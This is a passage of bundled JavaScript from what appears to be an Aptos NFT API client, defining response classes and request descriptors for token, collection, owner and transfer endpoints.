var $a7ef34a427d74c9c$export$163556b252e1351 = /** @class */ function() {
    function AptosNFTTokenResponse(input) {
        this.collectionDataIdHash = input.collectionDataIdHash;
        this.collectionName = input.collectionName;
        this.creatorAddress = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.creatorAddress);
        this.defaultProperties = $a7ef34a427d74c9c$export$f8bdf453dd4c34aa.create(input.defaultProperties);
        this.description = input.description;
        this.descriptionMutable = input.descriptionMutable;
        this.largestPropertyVersion = input.largestPropertyVersion;
        this.lastTransactionTimestamp = input.lastTransactionTimestamp;
        this.lastTransactionVersion = input.lastTransactionVersion;
        this.maximum = input.maximum;
        this.maximumMutable = input.maximumMutable;
        this.metadataUri = input.metadataUri;
        this.name = input.name;
        this.payeeAddress = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.payeeAddress);
        this.propertiesMutable = input.propertiesMutable;
        this.royaltyMutable = input.royaltyMutable;
        this.royaltyPointsDenominator = input.royaltyPointsDenominator;
        this.royaltyPointsNumerator = input.royaltyPointsNumerator;
        this.supply = input.supply;
        this.tokenDataIdHash = input.tokenDataIdHash;
        this.uriMutable = input.uriMutable;
    }
    AptosNFTTokenResponse.create = function(input) {
        if (input instanceof AptosNFTTokenResponse) return input;
        return new AptosNFTTokenResponse(input);
    };
    AptosNFTTokenResponse.fromJSON = function(json) {
        var input = {
            collectionDataIdHash: json.collection_data_id_hash,
            collectionName: json.collection_name,
            creatorAddress: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.creator_address),
            defaultProperties: $a7ef34a427d74c9c$export$f8bdf453dd4c34aa.fromJSON(json.default_properties),
            description: json.description,
            descriptionMutable: json.description_mutable,
            largestPropertyVersion: json.largest_property_version,
            lastTransactionTimestamp: json.last_transaction_timestamp,
            lastTransactionVersion: json.last_transaction_version,
            maximum: json.maximum,
            maximumMutable: json.maximum_mutable,
            metadataUri: json.metadata_uri,
            name: json.name,
            payeeAddress: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.payee_address),
            propertiesMutable: json.properties_mutable,
            royaltyMutable: json.royalty_mutable,
            royaltyPointsDenominator: json.royalty_points_denominator,
            royaltyPointsNumerator: json.royalty_points_numerator,
            supply: json.supply,
            tokenDataIdHash: json.token_data_id_hash,
            uriMutable: json.uri_mutable
        };
        return AptosNFTTokenResponse.create(input);
    };
    AptosNFTTokenResponse.prototype.toJSON = function() {
        return {
            collection_data_id_hash: this.collectionDataIdHash,
            collection_name: this.collectionName,
            creator_address: this.creatorAddress.toJSON(),
            default_properties: this.defaultProperties,
            description: this.description,
            description_mutable: this.descriptionMutable,
            largest_property_version: this.largestPropertyVersion,
            last_transaction_timestamp: this.lastTransactionTimestamp,
            last_transaction_version: this.lastTransactionVersion,
            maximum: this.maximum,
            maximum_mutable: this.maximumMutable,
            metadata_uri: this.metadataUri,
            name: this.name,
            payee_address: this.payeeAddress.toJSON(),
            properties_mutable: this.propertiesMutable,
            royalty_mutable: this.royaltyMutable,
            royalty_points_denominator: this.royaltyPointsDenominator,
            royalty_points_numerator: this.royaltyPointsNumerator,
            supply: this.supply,
            token_data_id_hash: this.tokenDataIdHash,
            uri_mutable: this.uriMutable
        };
    };
    return AptosNFTTokenResponse;
}();
var $a7ef34a427d74c9c$export$63fa3712925836c2 = {
    operationId: "getNFTsByIds",
    groupName: "nfts",
    httpMethod: "get",
    routePattern: "/nfts",
    parameterNames: [
        "token_ids",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return json.map(function(item) {
            return $a7ef34a427d74c9c$export$163556b252e1351.fromJSON(item);
        });
    },
    serializeRequest: function(request) {
        var tokenIds = request.tokenIds;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            token_ids: tokenIds,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$f6a9f034b0705043 = /** @class */ function() {
    function AptosNFTTokensByCollectionResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$163556b252e1351.create(item);
        });
    }
    AptosNFTTokensByCollectionResponse.create = function(input) {
        if (input instanceof AptosNFTTokensByCollectionResponse) return input;
        return new AptosNFTTokensByCollectionResponse(input);
    };
    AptosNFTTokensByCollectionResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$163556b252e1351.fromJSON(item);
            })
        };
        return AptosNFTTokensByCollectionResponse.create(input);
    };
    AptosNFTTokensByCollectionResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosNFTTokensByCollectionResponse;
}();
var $a7ef34a427d74c9c$export$e424a727202aabe6 = {
    operationId: "getNFTsByCollection",
    groupName: "nfts",
    httpMethod: "get",
    routePattern: "/nfts/collections/{collection_data_id_hash}/tokens",
    parameterNames: [
        "collection_data_id_hash",
        "limit",
        "offset",
        "cursor",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$f6a9f034b0705043.fromJSON(json);
    },
    serializeRequest: function(request) {
        var collectionDataIdHash = request.collectionDataIdHash;
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            collection_data_id_hash: collectionDataIdHash,
            limit: limit,
            offset: offset,
            cursor: cursor,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$b626a51288dd7212 = /** @class */ function() {
    function AptosNFTTokensByCreatorsResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$163556b252e1351.create(item);
        });
    }
    AptosNFTTokensByCreatorsResponse.create = function(input) {
        if (input instanceof AptosNFTTokensByCreatorsResponse) return input;
        return new AptosNFTTokensByCreatorsResponse(input);
    };
    AptosNFTTokensByCreatorsResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$163556b252e1351.fromJSON(item);
            })
        };
        return AptosNFTTokensByCreatorsResponse.create(input);
    };
    AptosNFTTokensByCreatorsResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosNFTTokensByCreatorsResponse;
}();
var $a7ef34a427d74c9c$export$9b8c2b9e2ea283c8 = {
    operationId: "getNFTsByCreators",
    groupName: "nfts",
    httpMethod: "get",
    routePattern: "/nfts/creators",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "creator_addresses",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$b626a51288dd7212.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var creatorAddresses = request.creatorAddresses.map(function(item) {
            return $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(item);
        });
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            creator_addresses: creatorAddresses.map(function(item) {
                return item.toJSON();
            }),
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$a6df6b2913cfbe4c = /** @class */ function() {
    function AptosNFTCollectionItemResponse(input) {
        this.collectionDataIdHash = input.collectionDataIdHash;
        this.collectionName = input.collectionName;
        this.creatorAddress = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.creatorAddress);
        this.description = input.description;
        this.descriptionMutable = input.descriptionMutable;
        this.lastTransactionTimestamp = input.lastTransactionTimestamp;
        this.lastTransactionVersion = input.lastTransactionVersion;
        this.maximum = input.maximum;
        this.maximumMutable = input.maximumMutable;
        this.metadataUri = input.metadataUri;
        this.supply = input.supply;
        this.tableHandle = input.tableHandle;
        this.uriMutable = input.uriMutable;
    }
    AptosNFTCollectionItemResponse.create = function(input) {
        if (input instanceof AptosNFTCollectionItemResponse) return input;
        return new AptosNFTCollectionItemResponse(input);
    };
    AptosNFTCollectionItemResponse.fromJSON = function(json) {
        var input = {
            collectionDataIdHash: json.collection_data_id_hash,
            collectionName: json.collection_name,
            creatorAddress: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.creator_address),
            description: json.description,
            descriptionMutable: json.description_mutable,
            lastTransactionTimestamp: json.last_transaction_timestamp,
            lastTransactionVersion: json.last_transaction_version,
            maximum: json.maximum,
            maximumMutable: json.maximum_mutable,
            metadataUri: json.metadata_uri,
            supply: json.supply,
            tableHandle: json.table_handle,
            uriMutable: json.uri_mutable
        };
        return AptosNFTCollectionItemResponse.create(input);
    };
    AptosNFTCollectionItemResponse.prototype.toJSON = function() {
        return {
            collection_data_id_hash: this.collectionDataIdHash,
            collection_name: this.collectionName,
            creator_address: this.creatorAddress.toJSON(),
            description: this.description,
            description_mutable: this.descriptionMutable,
            last_transaction_timestamp: this.lastTransactionTimestamp,
            last_transaction_version: this.lastTransactionVersion,
            maximum: this.maximum,
            maximum_mutable: this.maximumMutable,
            metadata_uri: this.metadataUri,
            supply: this.supply,
            table_handle: this.tableHandle,
            uri_mutable: this.uriMutable
        };
    };
    return AptosNFTCollectionItemResponse;
}();
var $a7ef34a427d74c9c$export$8b9def74a03e1fc3 = /** @class */ function() {
    function AptosNFTCollectionsByNameRangeResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$a6df6b2913cfbe4c.create(item);
        });
    }
    AptosNFTCollectionsByNameRangeResponse.create = function(input) {
        if (input instanceof AptosNFTCollectionsByNameRangeResponse) return input;
        return new AptosNFTCollectionsByNameRangeResponse(input);
    };
    AptosNFTCollectionsByNameRangeResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$a6df6b2913cfbe4c.fromJSON(item);
            })
        };
        return AptosNFTCollectionsByNameRangeResponse.create(input);
    };
    AptosNFTCollectionsByNameRangeResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosNFTCollectionsByNameRangeResponse;
}();
var $a7ef34a427d74c9c$export$4b98c6b703579a61 = {
    operationId: "getNFTCollections",
    groupName: "collections",
    httpMethod: "get",
    routePattern: "/collections",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "fromName",
        "toName",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$8b9def74a03e1fc3.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var fromName = request.fromName;
        var toName = request.toName;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            fromName: fromName,
            toName: toName,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$acedd0d733b6235a = {
    operationId: "getNFTCollectionsByIds",
    groupName: "collections",
    httpMethod: "get",
    routePattern: "/collections/ids",
    parameterNames: [
        "ids",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return json.map(function(item) {
            return $a7ef34a427d74c9c$export$a6df6b2913cfbe4c.fromJSON(item);
        });
    },
    serializeRequest: function(request) {
        var ids = request.ids;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            ids: ids,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$840ee7e29b6b160e = /** @class */ function() {
    function AptosNFTCollectionsByCreatorResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$a6df6b2913cfbe4c.create(item);
        });
    }
    AptosNFTCollectionsByCreatorResponse.create = function(input) {
        if (input instanceof AptosNFTCollectionsByCreatorResponse) return input;
        return new AptosNFTCollectionsByCreatorResponse(input);
    };
    AptosNFTCollectionsByCreatorResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$a6df6b2913cfbe4c.fromJSON(item);
            })
        };
        return AptosNFTCollectionsByCreatorResponse.create(input);
    };
    AptosNFTCollectionsByCreatorResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosNFTCollectionsByCreatorResponse;
}();
var $a7ef34a427d74c9c$export$da67b0ebe232b248 = {
    operationId: "getNFTCollectionsByCreator",
    groupName: "collections",
    httpMethod: "get",
    routePattern: "/collections/creators",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "creator_address",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$840ee7e29b6b160e.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var creatorAddress = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(request.creatorAddress);
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            creator_address: creatorAddress.toJSON(),
            network: network ? network.toJSON() : undefined
        };
    }
};
// $ref: #/components/schemas/NFTOwnerResponse/properties/token_properties
// typeName: NFTOwnerResponse_token_properties
var $a7ef34a427d74c9c$export$9bc8df113740028e = /** @class */ function() {
    function AptosNFTOwnerResponseTokenProperties() {}
    AptosNFTOwnerResponseTokenProperties.create = function(input) {
        return input;
    };
    AptosNFTOwnerResponseTokenProperties.fromJSON = function(json) {
        return json;
    };
    return AptosNFTOwnerResponseTokenProperties;
}();
var $a7ef34a427d74c9c$export$26cb313ae2b9c3df = /** @class */ function() {
    function AptosNFTOwnerResponse(input) {
        this.amount = $a7ef34a427d74c9c$export$5d1e9aab577c748d.create(input.amount);
        this.collectionDataIdHash = input.collectionDataIdHash;
        this.collectionName = input.collectionName;
        this.creatorAddress = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.creatorAddress);
        this.lastTransactionTimestamp = input.lastTransactionTimestamp;
        this.lastTransactionVersion = input.lastTransactionVersion;
        this.name = input.name;
        this.ownerAddress = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.ownerAddress);
        this.propertyVersion = input.propertyVersion;
        this.tableType = input.tableType;
        this.tokenDataIdHash = input.tokenDataIdHash;
        this.tokenProperties = $a7ef34a427d74c9c$export$9bc8df113740028e.create(input.tokenProperties);
    }
    AptosNFTOwnerResponse.create = function(input) {
        if (input instanceof AptosNFTOwnerResponse) return input;
        return new AptosNFTOwnerResponse(input);
    };
    AptosNFTOwnerResponse.fromJSON = function(json) {
        var input = {
            amount: $a7ef34a427d74c9c$export$5d1e9aab577c748d.fromJSON(json.amount),
            collectionDataIdHash: json.collection_data_id_hash,
            collectionName: json.collection_name,
            creatorAddress: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.creator_address),
            lastTransactionTimestamp: json.last_transaction_timestamp,
            lastTransactionVersion: json.last_transaction_version,
            name: json.name,
            ownerAddress: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.owner_address),
            propertyVersion: json.property_version,
            tableType: json.table_type,
            tokenDataIdHash: json.token_data_id_hash,
            tokenProperties: $a7ef34a427d74c9c$export$9bc8df113740028e.fromJSON(json.token_properties)
        };
        return AptosNFTOwnerResponse.create(input);
    };
    AptosNFTOwnerResponse.prototype.toJSON = function() {
        return {
            amount: this.amount.toJSON(),
            collection_data_id_hash: this.collectionDataIdHash,
            collection_name: this.collectionName,
            creator_address: this.creatorAddress.toJSON(),
            last_transaction_timestamp: this.lastTransactionTimestamp,
            last_transaction_version: this.lastTransactionVersion,
            name: this.name,
            owner_address: this.ownerAddress.toJSON(),
            property_version: this.propertyVersion,
            table_type: this.tableType,
            token_data_id_hash: this.tokenDataIdHash,
            token_properties: this.tokenProperties
        };
    };
    return AptosNFTOwnerResponse;
}();
var $a7ef34a427d74c9c$export$b4f82889fc89c467 = /** @class */ function() {
    function AptosNFTOwnersByTokensResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$26cb313ae2b9c3df.create(item);
        });
    }
    AptosNFTOwnersByTokensResponse.create = function(input) {
        if (input instanceof AptosNFTOwnersByTokensResponse) return input;
        return new AptosNFTOwnersByTokensResponse(input);
    };
    AptosNFTOwnersByTokensResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$26cb313ae2b9c3df.fromJSON(item);
            })
        };
        return AptosNFTOwnersByTokensResponse.create(input);
    };
    AptosNFTOwnersByTokensResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosNFTOwnersByTokensResponse;
}();
var $a7ef34a427d74c9c$export$3cb895384c3bd42b = {
    operationId: "getNFTOwnersByTokens",
    groupName: "nfts",
    httpMethod: "get",
    routePattern: "/nfts/owners",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "token_ids",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$b4f82889fc89c467.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var tokenIds = request.tokenIds;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            token_ids: tokenIds,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$fb4936b45890ee4c = /** @class */ function() {
    function AptosNFTOwnersByCollectionResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$26cb313ae2b9c3df.create(item);
        });
    }
    AptosNFTOwnersByCollectionResponse.create = function(input) {
        if (input instanceof AptosNFTOwnersByCollectionResponse) return input;
        return new AptosNFTOwnersByCollectionResponse(input);
    };
    AptosNFTOwnersByCollectionResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$26cb313ae2b9c3df.fromJSON(item);
            })
        };
        return AptosNFTOwnersByCollectionResponse.create(input);
    };
    AptosNFTOwnersByCollectionResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosNFTOwnersByCollectionResponse;
}();
var $a7ef34a427d74c9c$export$4f5fa3639a779107 = {
    operationId: "getNFTOwnersByCollection",
    groupName: "nfts",
    httpMethod: "get",
    routePattern: "/nfts/collections/{collection_data_id_hash}/owners",
    parameterNames: [
        "collection_data_id_hash",
        "limit",
        "offset",
        "cursor",
        "wallet_blacklist",
        "wallet_whitelist",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$fb4936b45890ee4c.fromJSON(json);
    },
    serializeRequest: function(request) {
        var collectionDataIdHash = request.collectionDataIdHash;
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var walletBlacklist = request.walletBlacklist;
        var walletWhitelist = request.walletWhitelist;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            collection_data_id_hash: collectionDataIdHash,
            limit: limit,
            offset: offset,
            cursor: cursor,
            wallet_blacklist: walletBlacklist,
            wallet_whitelist: walletWhitelist,
            network: network ? network.toJSON() : undefined
        };
    }
};
// $ref: #/components/schemas/NFTOwnersOfCollectionResponse
// type: NFTOwnersOfCollectionResponse
// properties:
// - cursor ($ref: #/components/schemas/NFTOwnersOfCollectionResponse/properties/cursor)
// - hasNextPage ($ref: #/components/schemas/NFTOwnersOfCollectionResponse/properties/hasNextPage)
// - result ($ref: #/components/schemas/NFTOwnersOfCollectionResponse/properties/result)
var $a7ef34a427d74c9c$export$4cee2db9cbf332ae = /** @class */ function() {
    function AptosNFTOwnersOfCollectionResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result;
    }
    AptosNFTOwnersOfCollectionResponse.create = function(input) {
        if (input instanceof AptosNFTOwnersOfCollectionResponse) return input;
        return new AptosNFTOwnersOfCollectionResponse(input);
    };
    AptosNFTOwnersOfCollectionResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result
        };
        return AptosNFTOwnersOfCollectionResponse.create(input);
    };
    AptosNFTOwnersOfCollectionResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result
        };
    };
    return AptosNFTOwnersOfCollectionResponse;
}();
var $a7ef34a427d74c9c$export$2b94b753bdbdd0bb = {
    operationId: "getNFTOwnersOfCollection",
    groupName: "nfts",
    httpMethod: "get",
    routePattern: "/nfts/collections/{collection_data_id_hash}/owners/list",
    parameterNames: [
        "collection_data_id_hash",
        "limit",
        "offset",
        "cursor",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$4cee2db9cbf332ae.fromJSON(json);
    },
    serializeRequest: function(request) {
        var collectionDataIdHash = request.collectionDataIdHash;
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            collection_data_id_hash: collectionDataIdHash,
            limit: limit,
            offset: offset,
            cursor: cursor,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$4e5fbbe518bf3d89 = /** @class */ function() {
    function AptosNFTTransferResponse(input) {
        this.coinAmount = input.coinAmount ? $a7ef34a427d74c9c$export$5d1e9aab577c748d.create(input.coinAmount) : undefined;
        this.coinType = input.coinType;
        this.collectionDataIdHash = input.collectionDataIdHash;
        this.collectionName = input.collectionName;
        this.creatorAddress = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.creatorAddress);
        this.eventAccountAddress = input.eventAccountAddress;
        this.eventCreationNumber = input.eventCreationNumber;
        this.eventSequenceNumber = input.eventSequenceNumber;
        this.fromAddress = input.fromAddress ? $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.fromAddress) : undefined;
        this.name = input.name;
        this.propertyVersion = input.propertyVersion;
        this.toAddress = input.toAddress ? $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.toAddress) : undefined;
        this.tokenAmount = $a7ef34a427d74c9c$export$5d1e9aab577c748d.create(input.tokenAmount);
        this.tokenDataIdHash = input.tokenDataIdHash;
        this.transactionTimestamp = input.transactionTimestamp;
        this.transactionVersion = input.transactionVersion;
        this.transferType = input.transferType;
    }
    AptosNFTTransferResponse.create = function(input) {
        if (input instanceof AptosNFTTransferResponse) return input;
        return new AptosNFTTransferResponse(input);
    };
    AptosNFTTransferResponse.fromJSON = function(json) {
        var input = {
            coinAmount: json.coin_amount ? $a7ef34a427d74c9c$export$5d1e9aab577c748d.fromJSON(json.coin_amount) : undefined,
            coinType: json.coin_type,
            collectionDataIdHash: json.collection_data_id_hash,
            collectionName: json.collection_name,
            creatorAddress: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.creator_address),
            eventAccountAddress: json.event_account_address,
            eventCreationNumber: json.event_creation_number,
            eventSequenceNumber: json.event_sequence_number,
            fromAddress: json.from_address ? $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.from_address) : undefined,
            name: json.name,
            propertyVersion: json.property_version,
            toAddress: json.to_address ? $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.to_address) : undefined,
            tokenAmount: $a7ef34a427d74c9c$export$5d1e9aab577c748d.fromJSON(json.token_amount),
            tokenDataIdHash: json.token_data_id_hash,
            transactionTimestamp: json.transaction_timestamp,
            transactionVersion: json.transaction_version,
            transferType: json.transfer_type
        };
        return AptosNFTTransferResponse.create(input);
    };
    AptosNFTTransferResponse.prototype.toJSON = function() {
        return {
            coin_amount: this.coinAmount ? this.coinAmount.toJSON() : undefined,
            coin_type: this.coinType,
            collection_data_id_hash: this.collectionDataIdHash,
            collection_name: this.collectionName,
            creator_address: this.creatorAddress.toJSON(),
            event_account_address: this.eventAccountAddress,
            event_creation_number: this.eventCreationNumber,
            event_sequence_number: this.eventSequenceNumber,
            from_address: this.fromAddress ? this.fromAddress.toJSON() : undefined,
            name: this.name,
            property_version: this.propertyVersion,
            to_address: this.toAddress ? this.toAddress.toJSON() : undefined,
            token_amount: this.tokenAmount.toJSON(),
            token_data_id_hash: this.tokenDataIdHash,
            transaction_timestamp: this.transactionTimestamp,
            transaction_version: this.transactionVersion,
            transfer_type: this.transferType
        };
    };
    return AptosNFTTransferResponse;
}();
var $a7ef34a427d74c9c$export$f1c0eaaff72ad9ad = /** @class */ function() {
    function AptosNFTTransfersByTokensResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$4e5fbbe518bf3d89.create(item);
        });
    }
    AptosNFTTransfersByTokensResponse.create = function(input) {
        if (input instanceof AptosNFTTransfersByTokensResponse) return input;
        return new AptosNFTTransfersByTokensResponse(input);
    };
    AptosNFTTransfersByTokensResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$4e5fbbe518bf3d89.fromJSON(item);
            })
        };
        return AptosNFTTransfersByTokensResponse.create(input);
    };
    AptosNFTTransfersByTokensResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosNFTTransfersByTokensResponse;
}();
var $a7ef34a427d74c9c$export$f80e60f41cfc5785 = {
    operationId: "getNFTTransfersByIds",
    groupName: "nfts",
    httpMethod: "get",
    routePattern: "/nfts/transfers",
    parameterNames: [
        "limit",
        "offset",
        "cursor",
        "wallet_blacklist",
        "wallet_whitelist",
        "token_ids",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$f1c0eaaff72ad9ad.fromJSON(json);
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var offset = request.offset;
        var cursor = request.cursor;
        var walletBlacklist = request.walletBlacklist;
        var walletWhitelist = request.walletWhitelist;
        var tokenIds = request.tokenIds;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            offset: offset,
            cursor: cursor,
            wallet_blacklist: walletBlacklist,
            wallet_whitelist: walletWhitelist,
            token_ids: tokenIds,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$18ddac2fb7a6631b = /** @class */ function() {
    function AptosGetNFTTransfersByCollectionResponse(input) {
        this.cursor = input.cursor;
        this.hasNextPage = input.hasNextPage;
        this.result = input.result.map(function(item) {
            return $a7ef34a427d74c9c$export$4e5fbbe518bf3d89.create(item);
        });
    }
    AptosGetNFTTransfersByCollectionResponse.create = function(input) {
        if (input instanceof AptosGetNFTTransfersByCollectionResponse) return input;
        return new AptosGetNFTTransfersByCollectionResponse(input);
    };
    AptosGetNFTTransfersByCollectionResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            hasNextPage: json.hasNextPage,
            result: json.result.map(function(item) {
                return $a7ef34a427d74c9c$export$4e5fbbe518bf3d89.fromJSON(item);
            })
        };
        return AptosGetNFTTransfersByCollectionResponse.create(input);
    };
    AptosGetNFTTransfersByCollectionResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            hasNextPage: this.hasNextPage,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosGetNFTTransfersByCollectionResponse;
}();
var $a7ef34a427d74c9c$export$5bdca0d2dcb271ad = {
    operationId: "getNFTTransfersByCollection",
    groupName: "nfts",
    httpMethod: "get",
    routePattern: "/nfts/transfers/collections/{collection_data_id_hash}",
    parameterNames: [
        "collection_data_id_hash",
        "limit",
        "offset",
        "cursor",
        "wallet_whitelist",
        "wallet_blacklist",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
